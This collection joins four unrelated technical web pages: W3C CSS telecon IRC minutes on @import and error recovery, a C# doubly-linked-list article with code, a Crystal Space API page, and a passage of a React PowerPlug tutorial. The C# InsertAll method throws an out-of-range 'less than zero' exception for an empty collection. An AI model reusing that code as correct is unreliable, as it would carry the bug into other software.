IRC log of css on 2009-02-25 Timestamps are in UTC. 16:53:30 [RRSAgent] RRSAgent has joined #css 16:53:30 [RRSAgent] logging to 16:53:39 [plinss] zakim, this will be style 16:53:40 [Zakim] ok, plinss; I see Style_CSS FP()12:00PM scheduled to start in 7 minutes 16:55:41 [Zakim] Style_CSS FP()12:00PM has now started 16:55:43 [Zakim] + +1.253.307.aaaa 16:56:40 [Zakim] - +1.253.307.aaaa 16:56:41 [Zakim] Style_CSS FP()12:00PM has ended 16:56:41 [Zakim] Attendees were +1.253.307.aaaa 16:57:43 [Zakim] Style_CSS FP()12:00PM has now started 16:57:45 [Zakim] + +1.858.354.aaaa 16:57:56 [plinss] zakim, +1.858.354 is me 16:57:57 [Zakim] +plinss; got it 16:58:07 [Zakim] +dsinger 16:58:08 [Zakim] -dsinger 16:58:09 [Zakim] +dsinger 16:58:14 [Zakim] + +1.253.307.aabb 16:58:27 [dsinger] dsinger has joined #css 16:58:46 [plinss] zakim, +1.253.307 is arronei 16:58:46 [Zakim] +arronei; got it 16:58:47 [dsinger] Zakim, mute me 16:58:48 [Zakim] dsinger should now be muted 16:58:58 [Zakim] +[Microsoft] 16:59:12 [dsinger] Good morning ... On bus as usual 16:59:24 [plinss] morning David 17:01:52 [plinss] zakim, [microsoft] has sylvaing 17:01:52 [Zakim] +sylvaing; got it 17:02:05 [dsinger] Zakim, who is here? 17:02:05 [Zakim] On the phone I see plinss, dsinger (muted), arronei, [Microsoft] 17:02:07 [Zakim] [Microsoft] has sylvaing 17:02:11 [Zakim] On IRC I see dsinger, RRSAgent, Zakim, arronei, fantasai, plinss_, shepazu, jdaggett, plinss, Bert, krijnh, trackbot, Hixie 17:02:45 [dsinger] Ah, do we have a chair? 17:02:51 [plinss] yes 17:03:20 [dsinger] Cool 17:03:28 [ChrisL] ChrisL has joined #css 17:03:50 [dbaron] dbaron has joined #css 17:04:27 [dsinger] I will have to stop at 9:55 btw 17:04:30 [Zakim] +ChrisL 17:04:55 [sylvaing] sylvaing has joined #css 17:05:16 [Zakim] +Bert 17:05:26 [Zakim] +David_Baron 17:06:17 [Zakim] +??P10 17:07:25 [dsinger] P10 must be fantasai? 
17:07:49 [ChrisL] zakim, ??p10 is probably fantasai 17:07:49 [Zakim] +fantasai?; got it 17:08:48 [ChrisL] scribe: chris 17:08:49 [Zakim] +howcome 17:08:53 [ChrisL] scribenick: chrisl 17:09:05 [ChrisL] rrsagent, here 17:09:05 [RRSAgent] See 17:09:19 [ChrisL] rrsagent, make logs public 17:09:26 [ChrisL] topic: @import 17:09:31 [plinss] 17:10:36 [ChrisL] cl: sent some email about multiple @rules clamouring to be 'first' 17:10:41 [ChrisL] zakim, who is speaking? 17:10:52 [Zakim] ChrisL, listening for 10 seconds I heard sound from the following: [Microsoft] (64%), ChrisL (63%), Bert (4%), howcome (5%) 17:11:20 [sylvaing] Zakim, [Microsoft] has sylvaing 17:11:20 [Zakim] sylvaing was already listed in [Microsoft], sylvaing 17:12:02 [ChrisL] sg: need to distinguish functionaly valid from syntactically valid 17:12:20 [ChrisL] hl: we should use the canonoical CSS syntax 17:12:35 [ChrisL] pl: agree with chris point but its not related to the current issue 17:12:53 [ChrisL] ... so the current case seems like a problem 17:12:54 [Zakim] +Melinda_Grant 17:13:20 [ChrisL] hl; problematic, use the eternal syntax not the css 1, 2 or 3 syntax 17:13:50 [ChrisL] db: so implementations that dont implement that currently will need to do so, to see if some junk fits the eternal synbtax 17:13:58 [melinda] melinda has joined #CSS 17:14:23 [ChrisL] ee: we don't wat to cut off extensibility 17:14:44 [ChrisL] sl: the specific test case in anne's emailis gramatically correct, but implementations differ 17:15:23 [ChrisL] ae: in fact it is invalid due to leading numeric 17:16:14 [ChrisL] pl: would not allow a valid rule, but would allow known or unknown @rules. 17:16:19 [ChrisL] hl: yes 17:16:28 [ChrisL] cl: i agree 17:16:52 [alexmog] alexmog has joined #css 17:16:52 [ChrisL] so in the anne test case, its not an @rule. 17:17:23 [ChrisL] sl: spec talks about valid statements, not @rules specifically. but this is not a valid statement 17:17:39 [ChrisL] hl: bert? 
17:18:00 [ChrisL] bb: don't want it to load, as the rule ight be valid in the future. need to stop it loading 17:18:12 [ChrisL] sl: butbrowsers do load these currently 17:18:17 [ChrisL] hl: they should not 17:18:41 [ChrisL] bb: some day we may invent an @rule that has to come before an @import 17:19:09 [ChrisL] cl: @charset isn't an @rule 17:19:17 [ChrisL] bb: no, its special cased in the grammar 17:19:19 [Zakim] -arronei 17:19:39 [ChrisL] ae: yes but its reparsed as an @rule once the charset is detected 17:19:45 [ChrisL] bb: no 17:20:30 [ChrisL] sl: spec says @import cannot come after a valid statement. but this is not a valid sytatement. 17:20:44 [ChrisL] bb: its correct 17:20:55 [ChrisL] bb: its a normal token, 17:21:15 [ChrisL] sl: which meaning of valid do we mean here. succesfully parsed, or known and can be applied? 17:21:19 [ChrisL] pl: the former 17:22:03 [ChrisL] hl: we cn say there should be nothing ahead of @import except @charset. removes need to discuss 'valid' 17:22:28 [ChrisL] db: has anyone looked at whatwebkit does? do not want to get into non-interoperable behaviour 17:22:47 [ChrisL] .. what exactly does webkit to to accept or reject this @rule? 17:23:21 [ChrisL] hl: if we can agree on a simple workable solution we can test it against implementations 17:23:29 [fantasai] db: The solution we use in Gecko is, if it parses into something that we know about, then we drop following @import rules 17:23:47 [ChrisL] db: in gecko, if the rule is dropped then we continue to process the @rule 17:23:59 [ChrisL] hl; easy to flag if something has been dropped 17:24:23 [ChrisL] db: an extra semicolon at end of time - would that cause the @import to be dropped? 17:24:26 [ChrisL] hl: no 17:24:28 [dsinger] dsinger has joined #css 17:24:40 [Zakim] +[Apple] 17:24:50 [Zakim] -dsinger 17:24:56 [dsinger] zakim, [apple] has dsinger 17:24:56 [Zakim] +dsinger; got it 17:25:03 [ChrisL] ee: do you drop @import after an invalid selector? 
eg two commas 17:25:11 [fantasai] or an unknown pseudo 17:25:17 [ChrisL] db: yes so following @import would be allowed 17:25:34 [ChrisL] bb: suggest we allow empty stements, space, cdo cdc, nothing else 17:25:40 [fantasai] s/allowed/loaded/ 17:25:51 [ChrisL] s/stements/statements/ 17:26:13 [ChrisL] plh: its reasonable but not forward compatible 17:26:51 [ChrisL] db: properties not an issue as they are inside the rules, . error in selctor forces rule to be dropped 17:26:58 [Lachy] Lachy has joined #css 17:27:06 [ChrisL] bb; concerned about things that could be valid in the future 17:27:44 [ChrisL] db: spec id clear on rules being ignored. if spec must be ignored it can't trigger other things 17:27:57 [ChrisL] cl: so ignored means treat as if it was never there 17:28:27 [ChrisL] db: we have that issue witha lot of things. dont want future stylesheets to break completely 17:28:53 [ChrisL] pl: issue is that if the rule becomes valid tomorrow, it stops the @import loading 17:29:37 [ChrisL] sl: this can happen today, ie8 does not support :: for example so following import will load but later, or in other browsers, it will be skipped 17:30:52 [ChrisL] cl: how much existing content would break if the spec said nothing before @import? 17:31:00 [ChrisL] hl: little to none 17:31:12 [ChrisL] pl: would require changes in implementations though 17:31:45 [ChrisL] ee: any @rules that are dropped should be allowed before @import 17:32:20 [ChrisL] db: media queries changed syntax f @import. its not valid css2. so does non-media-queries implementsation drop? 17:32:41 [szilles] szilles has joined #css 17:32:52 [dbaron] example was, given two rules: @import url(foo) (min-width:800px); @import url(bar); 17:32:53 [ChrisL] pl: there are implementations that do not support media queries 17:33:03 [dbaron] implementations without media queries skip the first; with this change would we also require them to skip the second? 
17:33:20 [fantasai] I strongly believe that we should allow dropped @rules before @import 17:33:35 [ChrisL] ee: we should allow any (currently invalid) @rule before @import 17:33:44 [ChrisL] sl: invalid or unknown? 17:33:48 [ChrisL] cl: unknown 17:33:54 [ChrisL] hl: can live with 17:34:31 [ChrisL] ee: and also as bert said, empty statements and cdo cdc 17:35:05 [ChrisL] pl; odd that current @rules would block @import 17:35:17 [ChrisL] db: thats ok and we want it for forward compat 17:35:43 [ChrisL] ee: adding @rule before @import is pretty rare. less of an issue than withselectors 17:36:14 [dbaron] so if you only allow unknown @-rules and don't allow anything that's not an @-rule, don't you end up distinguishing between: 17:36:20 [dbaron] @new-rule {} 17:36:23 [ChrisL] pl: issue is known @rules not supported by older browsers 17:36:24 [dbaron] @new-rule {}; /* extra semicolon at end */ 17:36:55 [ChrisL] pl: covered by emptystatement rule 17:37:12 [ChrisL] db; we have a concept of empty statement? 
17:37:22 [ChrisL] bb: would need to be defined in spec, but its clear 17:37:30 [ChrisL] pl; i detect consensus 17:39:20 [plinss] the current proposal is: disallow any statements before @import except: empty statements, comment tokens, and unknown, but wel-formed @rules 17:39:46 [ChrisL] ee: unknown or invalid 17:39:54 [fantasai] @foo; 17:39:57 [ChrisL] sl: it says unknown but wel formed 17:39:59 [fantasai] @import; 17:40:14 [fantasai] @namespace *; 17:40:30 [ChrisL] bb: grammar does not seem to allow empty statements 17:40:40 [ChrisL] ee: anything that has been ignored 17:40:54 [dbaron] yeah, maybe the extra-semicolon thing causes the next selector/rule to be ignored at present 17:41:10 [fantasai] that starts with an @sign 17:41:14 [ChrisL] s/anything/anything starting @/ 17:41:17 [fantasai] @1; 17:41:21 [fantasai] @import "style.css"; 17:41:45 [ChrisL] ee: @1; does not parse as an at-rule 17:41:57 [ChrisL] bb; neither a selector nor an @rule 17:42:14 [ChrisL] sl; has to parse as an @rule first, then the rule is applied 17:42:34 [ChrisL] pl: so @1; would block @import 17:42:36 [ChrisL] cl: yes 17:43:22 [ChrisL] (no objection heard) 17:43:25 [dbaron] I think it would be good to see the proposal actually written up. 17:43:45 [dbaron] This is rather hard to follow with lots of abstract statements. 17:43:57 [fantasai] I agree 17:44:07 [ChrisL] dbaron - yes, but if we resolve it then someone can get an action to write it up in detail 17:44:34 [ChrisL] bb: (error recovery - scribe missed) 17:44:34 [dbaron] I think we should action somebody to write it up without resolving. 17:45:06 [ChrisL] trackbot, status 17:45:49 [ChrisL] action; sylvian to write up the proposal on @import and unknown well formed @rules 17:45:58 [ChrisL] action: sylvian to write up the proposal on @import and unknown well formed @rules 17:45:58 [trackbot] Sorry, couldn't find user - sylvian 17:46:00 [Bert] (Issue 24 is about recovering from invalid tokens when inside a selector. 
The ; in @1; is such an invalid token. What to do? Skip to the next {}?) 17:46:03 [fantasai] Sylvain 17:46:15 [ChrisL] action: sylvain to write up the proposal on @import and unknown well formed @rules 17:46:16 [trackbot] Created ACTION-123 - Write up the proposal on @import and unknown well formed @rules [on Sylvain Galineau - due 2009-03-04]. 17:46:38 [fantasai] 17:46:40 [fantasai] 17:46:55 [ChrisL] topic: issue-24 17:46:57 [plinss] 17:46:59 [ChrisL] issue-24? 17:46:59 [trackbot] ISSUE-24 -- Does the 'background' shorthand needs both clip and origin? -- CLOSED 17:46:59 [trackbot] 17:47:19 [ChrisL] pl: not that one 17:47:41 [ChrisL] oops,css2.1 issue not tracker issue. ifnore above 17:48:05 [fantasai] 17:48:46 [ChrisL] ee: we wanted to requie matching brackets, the change we made to fix this solves selectors but adds a new problem for 17:48:56 [ChrisL] ... declarations 17:49:32 [ChrisL] ... makes the trap point for an invalid declaration to be astatement not a declaration 17:50:02 [ChrisL] ... so a rue with an invalid statement will be completely ignored instead of justthat statement 17:50:04 [fantasai] 17:50:53 [ChrisL] ee: so we need to go back and replace with 'statement ordeclaration'. or duplicate the rule, one for malformed statement and one for malformed declarations 17:51:23 [ChrisL] bb: statement or declaration is probably correct. problem is the section is called malformed declarations 17:51:29 [ChrisL] ee: change all occurences 17:51:41 [ChrisL] bb: would work 17:52:08 [ChrisL] bb: so if you are in a declaration, skip to end of declaration 17:52:15 [ChrisL] bb: yes, think its correct 17:52:52 [ChrisL] cl: so there are two proposals 17:53:30 [ChrisL] ee: scope of changes is only one paragraph 17:54:14 [ChrisL] bb; edge case, when inside a selector, if the token in error is at or before the start of the selector. what are you 'in' 17:54:19 [ChrisL] ee: a statement 17:54:25 [ChrisL] bb: what kind? 
17:54:36 [ChrisL] ee: you don;t know at that point 17:54:48 [ChrisL] bb: so ignore that singe token? 17:55:03 [ChrisL] ee: treat it as a selector, dont ignore that token. 17:55:19 [ChrisL] bb: talking of tokens thatare disallowed by the grammar 17:55:35 [ChrisL] bb: colon is allowed, better example .... 17:55:47 [ChrisL] ... closing brace for example 17:56:04 [ChrisL] ee: if its not an @rule, treat as aselector 17:56:19 [ChrisL] bb: fine with me. deals with future expansion 17:56:53 [ChrisL] pl: other opinions? 17:57:16 [ChrisL] bb: hard to follow without examples 17:57:21 [Zakim] -[Apple] 17:57:40 [dsinger] bye...another meeting, sorry 17:57:48 [ChrisL] pl: can we resolve here or do we need more discussion? 17:58:40 [dbaron] (Confusion about what we would be resolving on.) 17:59:38 [ChrisL] action: bert to propose specific wording on complete text for what is inserted and deleted for bracket/quote parsing 17:59:39 [trackbot] Created ACTION-124 - Propose specific wording on complete text for what is inserted and deleted for bracket/quote parsing [on Bert Bos - due 2009-03-04]. 17:59:49 [ChrisL] ee: is it solved with two separate rules? 17:59:53 [ChrisL] bb: not sure 18:00:25 [ChrisL] pl: why dont you two work together onthat action so it can be closed quickly 18:00:35 [ChrisL] zakim, list attendees 18:00:36 [Zakim] As of this point the attendees have been +1.858.354.aaaa, plinss, dsinger, +1.253.307.aabb, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai?, howcome, Melinda_Grant 18:00:40 [ChrisL] chair: Peter 18:00:57 [ChrisL] rrsagent, make minutes 18:00:57 [RRSAgent] I have made the request to generate ChrisL 18:02:18 [Zakim] -howcome 18:02:23 [Zakim] -[Microsoft] 18:02:24 [Zakim] -Melinda_Grant 18:02:24 [Zakim] -ChrisL 18:02:26 [Zakim] -plinss 18:02:27 [Zakim] -David_Baron 18:02:29 [Zakim] -Bert 18:02:33 [Zakim] -fantasai? 
18:02:35 [Zakim] Style_CSS FP()12:00PM has ended
18:02:36 [Zakim] Attendees were +1.858.354.aaaa, plinss, dsinger, +1.253.307.aabb, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai?, howcome, Melinda_Grant
18:02:45 [ChrisL] Meeting: CSS telcon
18:02:49 [ChrisL] rrsagent, make minutes
18:02:49 [RRSAgent] I have made the request to generate ChrisL
18:03:00 [dbaron] I assume no telecon next week since it'll be 2-3am between the first and second day of the f2f meeting
18:03:07 [ChrisL] zakim, where is 858?
18:03:07 [Zakim] North American dialing code 1.858 is California
18:03:20 [ChrisL] zakim, where is 253?
18:03:20 [Zakim] North American dialing code 1.253 is Washington
18:03:43 [arronei] 253 was arronei
18:03:43 [dbaron] 858 is San Diego
18:03:43 [ChrisL] dbaron, that seems a safe assumption
18:03:48 [plinss] chris: 858 was me
18:03:56 [dbaron]
18:04:19 [ChrisL] ok, they are both listed explicitly in the attendance list already
18:04:47 [ChrisL] Present: plinss, dsinger, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai, howcome, Melinda_Grant
18:04:53 [ChrisL] rrsagent, make minutes
18:04:53 [RRSAgent] I have made the request to generate ChrisL
18:15:55 [ChrisL] regrets: szilles, daniel, emily, molly, anne
18:15:57 [ChrisL] rrsagent, make minutes
18:15:57 [RRSAgent] I have made the request to generate ChrisL
18:16:55 [ChrisL] s/ifnore/ignore/
18:17:09 [ChrisL] s/bb;/bb:/g
18:17:36 [ChrisL] s/sl;/sl:/g
18:17:53 [ChrisL] s/pl;/pl:/g
18:18:07 [ChrisL] s/db;/db:/g
18:18:25 [ChrisL] s/hl;/hl:/g
18:18:41 [ChrisL] rrsagent, make minutes
18:18:41 [RRSAgent] I have made the request to generate ChrisL
18:20:55 [sylvaing] sylvaing has joined #css
18:33:33 [sylvaing] sylvaing has joined #css
20:00:56 [melinda] melinda has joined #CSS
20:02:26 [dbaron] dbaron has joined #css
20:28:56 [Zakim] Zakim has left #css
20:37:38 [sylvaing] sylvaing has joined #css
23:06:05 [sylvaing] sylvaing has joined #css
23:49:28 [sylvaing] sylvaing has joined #css
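[For reference: the malformed-declaration recovery discussed above corresponds to the example in CSS 2.1's rules for handling parsing errors — a parser that hits an invalid declaration skips to the end of that declaration only, rather than throwing away the whole rule:]

```css
p { color:green; color{;color:maroon}; color:red }
/* handled as if the author had written: */
p { color:green; color:red }
```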
http://www.w3.org/2009/02/25-css-irc
I was writing some code in C# the other day and I realized I needed a linked list to make something I was doing easier. I wanted a list that would collapse around a removed object, and that was not backed by an array. I naturally went to the .NET Framework and the System.Collections namespace to look at the .NET linked list that I just assumed would be there. To my surprise there was not one. I could not believe it. I then searched MSDN looking for one to see if it was placed in another namespace. It was not; it just did not exist in the .NET Framework. Finally, I searched the internet and still could not find one implemented in C#.

That inspired me to write my own linked list. Not just a standard linked list, but a doubly-linked list: a list where each element has a reference to the next element and the previous element. A standard linked list would just have a reference to the next element. With a doubly-linked list, the list can easily be traversed forward and backwards, and an element can be deleted in constant time.

My doubly-linked list, which we will call just LinkedList from now on, starts by implementing the following interfaces:

- IList
- ICollection
- IEnumerable
- ICloneable

Then under this public facade we have a lot of very important private members that do the bulk of the work:

- class Node
- class LinkedListEnumerator
- FindNodeAt(int)
- Remove(Node)
- Node headerNode
- int modifications

The Node class is a very simple class, yet it is a very key part of the LinkedList. It wraps an object and keeps a reference to the next node and the previous node. The Node class is hidden from the user of the LinkedList, so that it works like any other collection in the .NET Framework.

The headerNode member variable of type Node has an important role as the starting point in the list. This Node contains a null reference and can never be accessed by the user or removed. It is not considered in the count of total objects in the list.
This Node is important in a doubly-linked list, as it is technically the beginning and ending of the list.

The FindNodeAt(int index) method contains the search algorithm for accessing the list by index. At the moment it divides the list in half and searches from the beginning or the end depending on which is closest to the requested index. This method is used, directly or indirectly, by all the other methods that require access to an object by index. This helps to make the searches much faster. There is potential for improvement for large lists by further dividing before searching, however, at a cost for small lists. Right now this seems like the best compromise for most usages. The current algorithm used to find a Node is below.

Node node = headerNode;

if (index < (count / 2))
{
    for (int i = 0; i <= index; i++)
        node = node.NextNode;
}
else
{
    for (int i = count; i > index; i--)
        node = node.PreviousNode;
}

The Remove(Node value) method is important because it adjusts the remaining Nodes by compressing the list. This is done simply by taking the Node that needs to be removed, changing its previous Node's next-Node reference to its next Node, changing its next Node's previous-Node reference to its previous Node, and then leaving it for the garbage collector. This may be easier to understand by viewing the algorithm used in this method below.

if (value != headerNode)
{
    value.PreviousNode.NextNode = value.NextNode;
    value.NextNode.PreviousNode = value.PreviousNode;
    count--;
    modifications++;
}

The modifications member variable of type int is incremented every time there is a modification to the structure of the list. The variable is then used by the LinkedListEnumerator to guard against concurrent modifications to the list while enumerating.

The LinkedList class is not thread safe by design. If thread safety is required, the class can be extended to provide it.
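One way such an extension could look — a hypothetical sketch, not part of the article's code — is a wrapper that serializes access through a private lock object (only Add and Count are shown; the same pattern applies to the other members):

```csharp
// Hypothetical thread-safe wrapper sketch; assumes the public
// LinkedList members described in the article (Add, Count).
public class SynchronizedLinkedList
{
    private readonly LinkedList list = new LinkedList();
    private readonly object syncRoot = new object();

    public void Add(object value)
    {
        lock (syncRoot) { list.Add(value); }
    }

    public int Count
    {
        get { lock (syncRoot) { return list.Count; } }
    }
}
```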
The LinkedListEnumerator class is fail-fast. This means it uses the modifications variable it is passed when it is created to know if any modifications have been made while enumerating. The check is made in its MoveNext() method before it increments to the next value. If a modification has been detected then it will throw a SystemException that can then be caught and handled accordingly. Below is the source for the LinkedListEnumerator class.

private class LinkedListEnumerator : IEnumerator
{
    private LinkedList linkedList;
    private int validModificationCount;
    private Node currentNode;

    public LinkedListEnumerator(LinkedList linkedList)
    {
        this.linkedList = linkedList;
        validModificationCount = linkedList.modifications;
        currentNode = linkedList.headerNode;
    }

    public object Current
    {
        get { return currentNode.CurrentNode; }
    }

    public void Reset()
    {
        currentNode = linkedList.headerNode;
    }

    public bool MoveNext()
    {
        bool moveSuccessful = false;

        if (validModificationCount != linkedList.modifications)
            throw new SystemException(
                "A concurrent modification occurred to the LinkedList " +
                "while accessing it through its enumerator.");

        currentNode = currentNode.NextNode;

        if (currentNode != linkedList.headerNode)
            moveSuccessful = true;

        return moveSuccessful;
    }
}

The LinkedList(ICollection) constructor and the AddAll(ICollection) and InsertAll(int, ICollection) methods are there for convenience to the user of the list. The constructor calls AddAll(ICollection), which in turn calls InsertAll(int, ICollection). Below is the code for this method.

public virtual void InsertAll(int index, ICollection collection)
{
    if (collection != null)
    {
        if (0 < collection.Count)
        {
            modifications++;

            Node startingNode = (index == count ?
                headerNode : FindNodeAt(index));
            Node previousNode = startingNode.PreviousNode;

            foreach (object obj in collection)
            {
                Node node = new Node(obj, startingNode, previousNode);
                previousNode.NextNode = node;
                previousNode = node;
            }

            startingNode.PreviousNode = previousNode;
            count += collection.Count;
        }
        else
            throw new ArgumentOutOfRangeException("index", index,
                "less than zero");
    }
    else
        throw new ArgumentNullException("collection");
}

The LinkedList provides two methods for cloning. The first is the ICloneable interface's Clone() method; it provides a shallow copy of the LinkedList. The second is Clone(bool attemptDeepCopy). It attempts to make a deep copy of the list if passed true; if false, it will make a shallow copy. If an object in the list is not an ICloneable then it will throw a SystemException. The returned attempted deep copy is not guaranteed to be a true deep copy, as it defers the cloning to each object's own Clone() method. Here is the source for these two methods.

public virtual object Clone()
{
    LinkedList listClone = new LinkedList();

    for (Node node = headerNode.NextNode; node != headerNode;
         node = node.NextNode)
        listClone.Add(node.CurrentNode);

    return listClone;
}

public virtual LinkedList Clone(bool attemptDeepCopy)
{
    LinkedList listClone;

    if (attemptDeepCopy)
    {
        listClone = new LinkedList();
        object currentObject;

        for (Node node = headerNode.NextNode; node != headerNode;
             node = node.NextNode)
        {
            currentObject = node.CurrentNode;

            if (currentObject == null)
                listClone.Add(null);
            else if (currentObject is ICloneable)
                listClone.Add(((ICloneable)currentObject).Clone());
            else
                throw new SystemException("The object of type [" +
                    currentObject.GetType() +
                    "] in the list is not an ICloneable, cannot attempt " +
                    "a deep copy.");
        }
    }
    else
        listClone = (LinkedList)this.Clone();

    return listClone;
}

I believe this is a great class to learn how to implement your own custom collection.
It is also very useful as it is, and ready to be included in your next project. The rest of the class is fairly straightforward for a list collection. The class is fairly well commented using XML comment tags. Experienced and intermediate developers should have no trouble following the class.

This LinkedList is part of a set of .NET utilities I am developing, and have released as an open source project under the GNU General Public License (GPL). My complete project can be found at Source Forge.

Coding is a way of life. It's in the air we breathe. It pumps through our veins. Without it we soon crumble to dust. - Rodney S. Foley
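As a quick usage sketch (hypothetical — it assumes only the IList members implied by the interfaces above plus the Clone() method shown earlier):

```csharp
// Hypothetical usage sketch for the LinkedList described in the article.
LinkedList list = new LinkedList();
list.Add("Alligator");
list.Add("Crocodile");
list.Insert(1, "Gator");                     // IList.Insert

foreach (object item in list)                // enumerated via LinkedListEnumerator
    Console.WriteLine(item);

LinkedList copy = (LinkedList)list.Clone();  // shallow copy
```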
http://www.codeproject.com/Articles/2836/Doubly-Linked-List-Implementation?msg=1672007
csOBBFrozen Class Reference
[Geometry utilities]

Version of the csOBB with frozen corners (for optimization purposes). More...

#include <csgeom/obb.h>

Detailed Description

Version of the csOBB with frozen corners (for optimization purposes).

Definition at line 117 of file obb.h.

Constructor & Destructor Documentation

Create an empty csOBBFrozen which is not initialized.
Definition at line 142 of file obb.h.

Member Function Documentation

Copy a normal OBB and freeze the corners.
Definition at line 126 of file obb.h.
References csOBB::GetCorner().

Project this OBB to a 2D screen space box. Returns false if OBB is not on screen.

The documentation for this class was generated from the following file:

Generated for Crystal Space 1.2.1 by doxygen 1.5.3
http://www.crystalspace3d.org/docs/online/api-1.2/classcsOBBFrozen.html
If you’re trying to rapid prototype an app, the last thing you want to be doing is implementing the same state management logic over and over. Adding something like Redux can help, but it tends to just add a layer of complexity that can slow you down even further. React PowerPlug makes rapid prototyping a breeze by introducing a set of stateful components that let you focus on the good stuff: actually prototyping!

React PowerPlug is a set of renderless components that provide different types of state management scenarios by way of render props. The project is dependency-free, well documented and pretty small at around 3kb. A word of warning though: the project’s master branch is still considered unstable and under active development. I opted to talk about the unstable version because it has so much more to offer in terms of different types of stateful components.

Getting Started

To get things started, we will need to add React PowerPlug to our project.

Via npm:

$ npm install --save react-powerplug

Or via Yarn:

$ yarn add react-powerplug

With the dependency added to our project, we can import React PowerPlug in its entirety:

import ReactPowerPlug from "react-powerplug";

Or import the individual components we’d like to use:

import { Counter, Hover, Toggle } from "react-powerplug";

Examples

As mentioned, the master branch of this project has a ton of additional stateful components. While the type of data may be different between the components, nearly all of them accept an initial property to set the default state.

Managing State

A component’s state can come in many different forms. It could be as simple as holding a single value or as complex as a mixed bag of boolean values, counters and string values.

State

State is one of the more basic components.
Very similar to React’s baked in state property, State allows you to maintain an object of state properties that can be updated via setState:

<State initial={{ favorite: "", picked: "" }}>
  {({ state, setState }) => (
    <div>
      <button
        onClick={() =>
          setState({
            favorite: "Alligator",
            picked: new Date().toLocaleTimeString()
          })
        }
      >
        Alligator
      </button>
      <button
        onClick={() =>
          setState({
            favorite: "Crocodile",
            picked: new Date().toLocaleTimeString()
          })
        }
      >
        Crocodile
      </button>
      <button onClick={() => setState({ favorite: "", picked: "" })}>
        Reset
      </button>
      {state.favorite && state.picked && (
        <div>
          <br />You picked {state.favorite} at {state.picked}
        </div>
      )}
    </div>
  )}
</State>

Toggle

Toggle is a component for maintaining the state of a boolean value:

<Toggle initial={false}>
  {({ on, toggle }) => (
    <div>
      <input type="checkbox" checked={on} onChange={toggle} />
      <br /><br />
      {on && <div>This box is CHECKED!</div>}
      {!on && <div>This box is NOT CHECKED!</div>}
    </div>
  )}
</Toggle>

Counter

Counter allows you to increment and decrement an integer in the state:

<Counter initial={0}>
  {({ count, inc, dec }) => (
    <div>
      {count === 0 && <div>There are no little alligators</div>}
      {count === 1 && <div>There is 1 little lonely alligator</div>}
      {count > 1 && <div>There are {count} little alligators</div>}
      <div>
        <br />
        <button onClick={dec}>-</button>
        <button onClick={inc}>+</button>
      </div>
    </div>
  )}
</Counter>

Value

Value is for maintaining the state of a single value. Set it and forget it:

<Value initial="#008F68">
  {({ value, set }) => (
    <div>
      <div
        style={{
          height: 100,
          width: 100,
          background: value,
          margin: "0 auto"
        }}
      />
      <div>
        <br />
        <button onClick={() => set("#008F68")}>#008F68</button>
        <button onClick={() => set("#6DB65B")}>#6DB65B</button>
        <button onClick={() => set("#4AAE9B")}>#4AAE9B</button>
      </div>
    </div>
  )}
</Value>

Map

The Map component is quite similar to State as it controls state as an object with different properties.
Where it differs is that you interact with the state via get and set methods:

<Map initial={{ favorite: "", picked: "" }}>
  {({ set, get }) => (
    <div>
      <button
        onClick={() => {
          set("favorite", "Alligator");
          set("picked", new Date().toLocaleTimeString());
        }}
      >
        Alligator
      </button>
      <button
        onClick={() => {
          set("favorite", "Crocodile");
          set("picked", new Date().toLocaleTimeString());
        }}
      >
        Crocodile
      </button>
      <button
        onClick={() => {
          set("favorite", "");
          set("picked", "");
        }}
      >
        Reset
      </button>
      {get("favorite") && get("picked") && (
        <div>
          <br />You picked {get("favorite")} at {get("picked")}
        </div>
      )}
    </div>
  )}
</Map>

Set

Not to be confused with the aforementioned set method, the Set component manages its state as an array of values which you can add to and remove from:

<Set initial={["Alligator", "Crocodile"]}>
  {({ values, add, remove }) => (
    <div>
      {values.length === 0 && <div>Our set is empty!</div>}
      {values.length > 0 && (
        <div>
          {values.map(value => (
            <div>
              {value} <button onClick={() => remove(value)}>X</button>
              <br /><br />
            </div>
          ))}
        </div>
      )}
      <input
        type="text"
        placeholder="Type here and hit enter"
        onKeyPress={event => {
          if (event.key === "Enter") {
            add(event.target.value);
            event.target.value = "";
          }
        }}
      />
    </div>
  )}
</Set>

List

List also holds its state as an array. Instead of simple add and remove methods, you interact with the array via push and pull methods.
Considering the complexity that is introduced by needing to know the index of the array item when pulling from the state, I’d probably just stick to Set:

<List initial={["Alligator", "Crocodile"]}>
  {({ list, push, pull }) => (
    <div>
      {list.length === 0 && <div>Our list is empty!</div>}
      {list.length > 0 && (
        <div>
          {list.map(item => (
            <div>
              {item} <button onClick={() => pull(i => item === i)}>X</button>
              <br /><br />
            </div>
          ))}
        </div>
      )}
      <input
        type="text"
        placeholder="Type here and hit enter"
        onKeyPress={event => {
          if (event.key === "Enter") {
            push(event.target.value);
            event.target.value = "";
          }
        }}
      />
    </div>
  )}
</List>

Managing User Interactions

Keeping track of a user’s interaction with a component usually includes binding event handlers on top of keeping track of the current state. React PowerPlug does a great job of not only combining these implementations but also keeping you fairly insulated from needing to worry about event handlers.

Hover

Hover keeps track of whether or not a user is hovering over a component:

<Hover>
  {({ hovered, bind }) => (
    <div {...bind}>
      {!hovered && <div>See you later, alligator!</div>}
      {hovered && <div>After 'while, crocodile!</div>}
    </div>
  )}
</Hover>

Active

Active knows if a user is clicking on a component:

<Active>
  {({ active, bind }) => (
    <div {...bind}>
      {!active && <span>Click here to activate!</span>}
      {active && <span>STOP CLICKING ME!!</span>}
    </div>
  )}
</Active>

Touch

Similar to Active, the Touch component is the touch-friendly equivalent:

<Touch>
  {({ touched, bind }) => (
    <div {...bind}>
      {!touched && <span>Touch here to trigger!</span>}
      {touched && <span>STOP TOUCHING ME!!</span>}
    </div>
  )}
</Touch>

Focus

Focus is perfect for showing and hiding information based on which field a user is currently interacting with:

<Focus>
  {({ focused, bind }) => (
    <div>
      <input
        type="text"
        placeholder="Click to focus this input!"
        {...bind}
      />
      <div>
        {focused ? "Great for showing help text ONLY when focused!" : ""}
      </div>
    </div>
  )}
</Focus>

Forms

Even though React PowerPlug has components that could easily be used to wrap up form components, they still took the time to include some form-specific components to help save you time:

Input

Input, which works with input instead of replacing it, binds input events to an input or any form field and stashes the value in the state:

<Input initial="">
  {({ bind, value }) => (
    <div>
      <input type="text" {...bind} />
      <div>
        {value.length
          ? `You typed: ${value}`
          : "You have not typed anything :("}
      </div>
    </div>
  )}
</Input>

Form

